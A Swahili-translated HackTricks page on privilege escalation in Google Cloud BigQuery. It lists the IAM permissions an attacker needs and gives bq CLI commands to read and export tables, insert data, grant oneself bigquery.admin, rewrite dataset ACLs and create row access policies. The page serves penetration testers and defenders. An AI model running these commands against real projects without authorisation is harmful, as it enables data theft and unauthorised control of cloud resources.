Swahili - Ht Cloud
HackTricks Training Twitter Linkedin Sponsor

GCP - BigQuery Privesc

Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

BigQuery

Kwa habari zaidi kuhusu BigQuery angalia:

pageGCP - Bigquery Enum

Soma Jedwali

Kusoma habari iliyohifadhiwa ndani ya jedwali la BigQuery inaweza kuwa na uwezekano wa kupata habari nyeti. Kupata habari hiyo, idhini inayohitajika ni bigquery.tables.get, bigquery.jobs.create na bigquery.tables.getData:

bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'

Hifadhi data

Hii ni njia nyingine ya kupata data. Ihifadhi kwenye ndoo ya hifadhi ya wingu na pakuwa faili zenye habari. Ili kutekeleza hatua hii, ruhusa zifuatazo zinahitajika: bigquery.tables.export, bigquery.jobs.create na storage.objects.create.

bq extract <dataset>.<table> "gs://<bucket>/table*.csv"

Weka data

Inawezekana kuwa weka data fulani ya kuaminika kwenye meza ya Bigquery ili kutumia udhaifu mahali pengine. Hii inaweza kufanywa kwa urahisi na ruhusa za bigquery.tables.get, bigquery.tables.updateData na bigquery.jobs.create:

# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'

# Via insert param
bq insert dataset.table /tmp/mydata.json

bigquery.datasets.setIamPolicy

Mshambuliaji anaweza kutumia ruhusa hii kujipa ruhusa zaidi juu ya seti ya data ya BigQuery:

# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>

# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy

bigquery.datasets.update, (bigquery.datasets.get)

Ruhusa hii pekee inaruhusu kuboresha ufikiaji wako kwenye seti ya data ya BigQuery kwa kubadilisha ACLs ambazo zinaonyesha ni nani anaweza kuipata:

# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
## Give permissions to the desired user
bq update --source acl.json <proj>:<dataset>

bigquery.tables.setIamPolicy

Mshambuliaji anaweza kutumia ruhusa hii kujipa mamlaka zaidi juu ya meza ya BigQuery:

# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
--member='user:<email>' \
--role='roles/bigquery.admin' \
<proj>:<dataset>.<table>

# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy

bigquery.rowAccessPolicies.update, bigquery.rowAccessPolicies.setIamPolicy, bigquery.tables.getData, bigquery.jobs.create

Kulingana na nyaraka, kwa idhini zilizotajwa ni kufanya mabadiliko kwenye sera ya safu. Walakini, kutumia cli bq unahitaji zaidi: bigquery.rowAccessPolicies.create, bigquery.tables.get.

bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("user:user@email.xyz") FILTER USING (term = "Cfba");' # A example filter was used

Inawezekana kupata kitambulisho cha kichuja katika matokeo ya uorodheshaji wa sera za safu. Mfano:

bq ls --row_access_policies <proj>:<dataset>.<table>

Id        Filter Predicate            Grantees              Creation Time    Last Modified Time
------------- ------------------ ----------------------------- ----------------- --------------------
apac_filter   term = "Cfba"      user:asd@hacktricks.xyz   21 Jan 23:32:09   21 Jan 23:32:09
Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)!

Njia nyingine za kusaidia HackTricks:

PreviousGCP - Artifact Registry PrivescNextGCP - ClientAuthConfig Privesc

Last updated